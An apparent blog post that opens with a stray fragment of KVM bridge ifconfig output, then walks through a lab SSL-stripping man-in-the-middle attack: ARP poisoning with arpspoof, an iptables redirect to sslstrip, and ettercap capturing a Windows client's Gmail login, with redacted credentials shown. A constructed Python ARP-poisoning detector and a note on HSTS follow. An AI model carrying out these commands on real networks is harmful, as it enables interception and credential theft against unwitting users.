inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
inet6 addr: fe80::283e:fff:fef6:b202/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:30 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:4575 (4.5 KB)
When adding a network to a virtual machine, br0 can now be selected.
ifconfig after adding br0 to the VM and starting it
- ifconfig on the VM. It is now on the same network as the KVM host's eth0.
[root@localhost ~]# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 52:54:00:0E:79:80
inet addr:192.168.1.6 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::5054:ff:fe0e:7980/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:47 errors:0 dropped:0 overruns:0 frame:0
TX packets:86 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:6714 (6.5 KiB) TX bytes:13514 (13.1 KiB)
Interrupt:10 Base address:0xe000
Analyze ( strip ? ) SSL Traffic with sslstrip , arpspoof and ettercap
I had been using ssldump to decode SSL traffic, but was looking around for some other good tool...
I tried decoding SSL traffic with sslstrip, arpspoof and ettercap.
SSL client: 192.168.1.2 ( Windows )
sslstrip, arpspoof, ettercap machine: 192.168.1.3 ( BackTrack Linux 4 final )
Internet --- Router 1.254 --- 1.3 Windows
--- 1.2 eth0 BackTrack Linux
[ sslstrip machine ]
- Modify the ettercap configuration file ( uncomment the following two lines )
ettercap NG-0.7.3 - A multipurpose sniffer/content filter for man in the middle attacks
root@bt:# vi /etc/etter.conf
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- Enable IP forwarding
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~#
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
1
- Run arpspoof
arpspoof -t <target IP> <default gateway>
root@bt:~# arpspoof -i eth0 -t 192.168.1.2 192.168.1.254
OPTIONS
-i interface Specify the interface to use.
-t target Specify a particular host to ARP poison (if not specified, all hosts on the LAN).
host Specify the host you wish to intercept packets for (usually the local gateway).
- Redirect destination port 80 to port 10000 ( sslstrip listens on port 10000 and strips the SSL traffic )
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Start sslstrip
root@bt:~# sslstrip -a -f -k
sslstrip 0.6 by Moxie Marlinspike running...
- sslstrip listens on port 10000
root@bt:~# lsof -i:10000
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sslstrip 6188 root 4u IPv4 23821 TCP *:webmin (LISTEN)
root@bt:~# sslstrip --help
sslstrip 0.6 by Moxie Marlinspike
Usage: sslstrip
Options:
-w , --write= Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l , --listen= Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.
- Packet capture
root@bt:~# ettercap -T -q -i eth0
Log in to Gmail from Windows ( IE ).
The username and password are visible. ( on the sslstrip machine )
root@bt:~# ettercap -T -q -i eth0
HTTP : 66.249.89.104:443 -> USER: xxxxx@gmail.com PASS: xxxxx INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx
HTTP : 66.249.89.104:80 -> USER: xxxxx@gmail.com PASS: xxxxx INFO: http://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx
It can also be viewed in html format ( -V html )
root@bt:~# ettercap -T -i eth0 -V html
HTTP/1.1 200 OK
Cache-Control: public, max-age=604800
Expires: Thu, 10 Jun 2010 17:34:41 GMT
Date: Thu, 03 Jun 2010 17:34:41 GMT
Refresh: 0;URL=https://mail.google.com/mail/
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 234
Server: GSE
GET /mail/ HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */*
Accept-Language: ja-JP
-V, --visual
Use this option to set the visualization method for the packets
to be displayed.
FORMAT may be one of the following:
hex Print the packets in hex format.
example:
the string "HTTP/1.1 304 Not Modified" becomes:
0000: 4854 5450 2f31 2e31 2033 3034 204e 6f74  HTTP/1.1 304 Not
0010: 204d 6f64 6966 6965 64                   Modified
ascii Print only "printable" characters, the others are displayed as dots '.'
text Print only the "printable" characters and skip the others.
ebcdic Convert an EBCDIC text to ASCII.
html Strip all the html tags from the text. A tag is every string between < and >.
example:
, but the following will not be displayed.
This is the title, but the following will not be displayed.
utf8 Print the packets in UTF-8 format. The encoding used while performing the conversion is declared in the etter.conf(5) file.
The trick is a man-in-the-middle attack: it intercepts the SSL session and decodes it.
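From the defender's side, the ARP poisoning this setup depends on is visible on the wire: the gateway's IP address suddenly appears in ARP replies with a different sender MAC, repeated every couple of seconds. The following Python is an added example, not from the original post, of a small monitor that pins the gateway's known-good MAC and alerts on replies that contradict it, or on one MAC claiming several IP addresses. All MACs, timestamps and the reply list are constructed; the IP addresses follow the post's lab layout (router 192.168.1.254, client 192.168.1.2, BackTrack host 192.168.1.3).

```python
"""Detect ARP-cache poisoning of the kind arpspoof performs, from a stream of ARP replies.

Added example, not from the original post. The pinned gateway MAC, the
host MACs and the timestamps are constructed; in practice the replies
would come from a packet capture on the segment being protected.
"""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

GATEWAY_IP = "192.168.1.254"
GATEWAY_MAC = "00:11:22:33:44:ff"   # constructed: learned during a clean baseline

# Constructed ARP replies: (seconds since start, sender IP, sender MAC).
SAMPLE_REPLIES: List[Tuple[float, str, str]] = [
    (0.0, "192.168.1.254", "00:11:22:33:44:ff"),  # genuine gateway reply
    (1.0, "192.168.1.2",   "52:54:00:aa:bb:02"),  # client answering normally
    (2.0, "192.168.1.3",   "52:54:00:aa:bb:03"),  # BackTrack host's own address
    (3.0, "192.168.1.254", "52:54:00:aa:bb:03"),  # gateway IP now claimed by 1.3's MAC
    (5.0, "192.168.1.254", "52:54:00:aa:bb:03"),  # poisoning repeats periodically
]


class ArpMonitor:
    """Track IP-to-MAC claims and raise alerts on contradictions."""

    def __init__(self, pinned: Dict[str, str]):
        # Static, trusted bindings (gateway, servers); compared case-insensitively.
        self.pinned = {ip: mac.lower() for ip, mac in pinned.items()}
        self.ips_by_mac: Dict[str, Set[str]] = defaultdict(set)

    def observe(self, ts: float, ip: str, mac: str) -> List[str]:
        mac = mac.lower()
        alerts: List[str] = []
        expected = self.pinned.get(ip)
        if expected is not None and mac != expected:
            alerts.append(f"{ts:.1f}s: {ip} claimed by {mac}, pinned MAC is {expected}")
        self.ips_by_mac[mac].add(ip)
        if len(self.ips_by_mac[mac]) > 1:
            # One interface answering for several addresses is the other fingerprint
            # of arpspoof-style poisoning.
            alerts.append(f"{ts:.1f}s: {mac} now claims {sorted(self.ips_by_mac[mac])}")
        return alerts


def scan(replies: List[Tuple[float, str, str]]) -> List[str]:
    """Run the monitor over a reply list and return every alert it raised."""
    mon = ArpMonitor({GATEWAY_IP: GATEWAY_MAC})
    out: List[str] = []
    for ts, ip, mac in replies:
        out.extend(mon.observe(ts, ip, mac))
    return out


if __name__ == "__main__":
    for line in scan(SAMPLE_REPLIES):
        print(line)
```

On the client side the same contradiction can be caught by pinning the gateway with a static ARP entry, and the downgrade half of the attack (the 443 -> 80 rewrite seen in the ettercap output above) is what HSTS exists to prevent.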